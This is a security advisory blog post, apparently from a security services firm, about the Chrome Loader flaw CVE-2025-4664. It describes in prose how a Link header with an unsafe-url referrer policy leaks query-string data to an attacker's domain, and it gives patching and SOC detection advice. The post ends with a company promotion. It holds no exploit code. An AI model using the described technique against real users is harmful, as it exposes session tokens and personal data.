May 2025 — A newly disclosed Chrome vulnerability tracked as CVE-2025-4664 is drawing urgent attention across the security community. The flaw, identified as a case of insufficient policy enforcement in Chrome’s Loader component, allows attackers to bypass same-origin restrictions and exfiltrate sensitive query parameters to third-party domains. Google released a patch for the issue on May 14, 2025, as part of Chrome version 136.0.7103.113, but the vulnerability has already been actively exploited in the wild.
What Is CVE-2025-4664?
CVE-2025-4664 affects how Google Chrome handles the Link HTTP header on sub-resource requests. While most browsers ignore the referrer-policy defined in this context, Chrome uniquely processes it. By setting the referrer-policy to unsafe-url, an attacker can craft a malicious page that forces the browser to include full query parameters in the Referer header when fetching a sub-resource—such as an image—from an attacker-controlled domain.
This subtle behavior opens the door for cross-origin data leaks. If URLs contain sensitive information in the query string—like session tokens, user IDs, or email addresses—those details can be silently leaked. Although the CVSS v3 score is listed as 4.3 (medium severity), the real-world impact can be far more damaging depending on how developers handle authentication and data in URLs.
Active Exploitation and Research Disclosure
The vulnerability was responsibly disclosed by security researcher Vsevolod Kokorin (@slonser_), who also published a proof-of-concept on May 5. Google confirmed that exploits for this vulnerability exist in the wild, though no targeted campaigns have been publicly attributed yet. CVE-2025-4664 follows closely on the heels of another Chrome zero-day, CVE-2025-2783, which was exploited by threat actors earlier this year in espionage operations.
Mitigation and Patching
Google’s security update is now available for Windows, macOS, and Linux users running Chrome version 136.0.7103.113 or later. Users of other Chromium-based browsers—including Microsoft Edge, Brave, Opera, and Vivaldi—should also apply security updates as soon as vendors release patches.
Administrators should verify that Chrome instances across managed environments have been updated and consider implementing enterprise policy controls that restrict outdated versions of the browser. Furthermore, content security policies (CSP) and strict referrer-policy headers should be reviewed and explicitly defined to avoid similar future issues.
What SOC Teams Need to Know
Security Operations Center (SOC) teams should prioritize monitoring for potential abuse of this vulnerability, especially in environments where sensitive data may be passed via URL query parameters. While this is typically considered a poor security practice, it remains common in many web applications—making this vulnerability a viable vector for lateral movement or data leakage.
Analysts should inspect outbound traffic for unusual image or sub-resource requests made to third-party domains that include referrer headers with query strings. Detection rules within SIEM platforms should be updated to log HTTP requests containing sensitive tokens in referer fields—especially requests originating from browser agents tied to Chrome versions prior to 136.0.7103.113.
Teams should also validate internal web applications for adherence to modern security headers. Sites should avoid using unsafe-url as a default referrer policy and explicitly define strict referrer-policy headers to limit exposure. Developers should be discouraged from placing any sensitive tokens or credentials in the URL path or query string. These should be passed securely using headers or within POST bodies whenever possible.
In organizations where browser management is part of the IT stack, ensure Chrome auto-updates are enforced and that no legacy Chromium-based browsers are permitted to access sensitive internal applications. With known exploits circulating, unmanaged browser instances may represent a weak point in an otherwise hardened perimeter.
How Can Netizen Help?
Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.
Questions or concerns? Feel free to reach out to us any time –
https://www.netizen.net/contact
